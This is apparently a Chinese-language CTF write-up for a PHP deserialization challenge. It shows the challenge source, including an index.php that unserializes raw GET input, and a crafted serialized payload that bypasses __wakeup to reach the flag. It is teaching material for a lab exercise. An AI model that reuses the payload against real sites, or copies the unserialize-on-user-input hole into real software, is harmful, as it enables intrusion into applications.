2.6 [极客大挑战 2019]PHP

根据题目提示:题目有源码备份,下载得到www.zip。

有三个php文件
class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();


}
}

index.php
1
2
3
4
5
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

flag.php
1
2
3
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

通过分析知:$select进行反序列化。
关键在class.php中的_destruct()魔法函数。
对于序列化问题有调用魔法函数顺序的问题:


对于题目需要将username=admin,password=100,但是会先执行_wakeup函数将username=guest,所以这道题目关键在于如何绕过_wakeup函数。
知识点:如何绕过_wakeup

测试php:

形成payload:
1
2

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

这个payload绕过__wakeup()函数,使username不被覆盖,加上%00是因为username和password都是私有变量,变量中的类名前后会有空白符,而复制的时候会丢失。
得到flag

参考博客:
https://www.jianshu.com/p/bfe00fd583df

#
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×